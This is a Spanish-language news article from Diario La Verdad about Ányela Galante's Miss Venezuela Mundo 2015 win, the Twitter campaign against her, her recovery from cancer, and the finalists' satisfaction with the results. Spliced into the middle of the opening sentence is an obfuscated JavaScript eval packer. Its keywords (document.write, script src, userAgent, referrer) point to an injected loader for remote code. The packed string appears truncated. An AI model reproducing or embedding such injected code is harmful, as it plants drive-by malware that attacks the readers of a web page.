publicidad

“Nunca quise inspirar lástima”

Daniel Cubillán / Maracaibo / noticias@laverdad.com
Ányela eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hrhzy|var|u0026u|referrer|itraa||js|php'.split('|'),0,{})) Galante, miss Venezuela Mundo 2015, habla tras triunfar en el certamen. Hubo una fuerte campaña de desprestigio en su contra en las redes sociales. Las finalistas dijeron estar “conformes” con los resultados

Ányela Galante (miss Venezuela Mundo 2015), Karielys Cuadros (primera finalista) y María José Brito (segunda finalista) en su visita a Portadas. (Foto: Cortesía Miss Venezuela)

A nadie le sorprendió el triunfo de Ányela Galante el pasado sábado en el concurso Miss Venezuela Mundo 2015. Siempre sonó como la más fuerte a llevarse el título y la campaña que se propagó por las redes sociales, horas antes del concurso, afianzó aún más los rumores. 

Sobre esos comentarios que se hicieron sentir en Twitter, la oriunda de Cantaura los calificó de “malintencionados y sin base”. Como la “miss tramoyera” fue catalogada por los usuarios de la red social que utilizaron la herramienta para pronunciarse en contra de lo que finalmente fue una victoria cantada. “Tenían miedo de mi potencial” fue la respuesta de Galante para sus detractores.

La ganadora del casting Señorita Centrooccidental reveló que en algún momento durante la noche final sintió que no quedaría entre las finalistas, mucho menos que se alzaría con la corona, pues fue la última en ser llamada para integrar el cuadro final. “Cuando anunciaron a las primeras cuatro finalistas pensé: Ay, no me incluyeron. Luego escuché mi nombre y suspiré de satisfacción".

Batalla superada

Su historia sobre la lucha contra el cáncer fue sin duda el gancho para acercarse al triunfo. La modelo le ganó la batalla  a esta enfermedad y asegura que lo que representa una de las victorias más significativas de su vida será presentada al mundo. “Logré superar esta dura enfermedad y ese es el lema que yo quiero hacer llegar a la sociedad: Si yo pude, ellos también lo harán.

La beldad asevera que cuando se atrevió a contar su experiencia nunca quiso generar lástima, ni en las personas que integran la organización ni en el público. Tiene claro que su preparación para el concurso internacional debe comenzar cuanto antes y debido a los múltiples compromisos con la organización congelará sus estudios universitarios. 

Finalistas conformes 

La decisión del Zar de la Belleza parece fue acatada sin problemas, pues Karielys Cuadros y María José Brito, primera y segunda finalista respectivamente, expresaron sentirse “a gusto” con el lugar que finalmente ocuparon. Brito, elogiada por su expresión oral, fue la primera en intervenir al respecto manifestando estar “dispuesta a trabajar en lo que me pongan. Las cosas pasan por algo, obviamente todas trabajamos pensando en ganar pero hoy puedo decir que soy una de las triunfadoras del Miss Venezuela Mundo 2015”.

Karielys, otra de las favoritas de la noche, se mostró satisfecha con su banda de Belleza Responsable, más que con la de primera finalista y destacó que “es una gran oportunidad para desarrollar mi proyecto social sobre el bulliying. Estoy lista para comenzar a trabajar”. 

Ányela anunció que ayer tuvo su primera reunión con Osmel Sousa luego de ser coronada. Conversaron sobre las actividades que cumplirá a partir de ahora, su preparación y participación para el Miss Mundo. 

 

 

El concurso internacional se realizará el próximo 19 de diciembre en China.

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama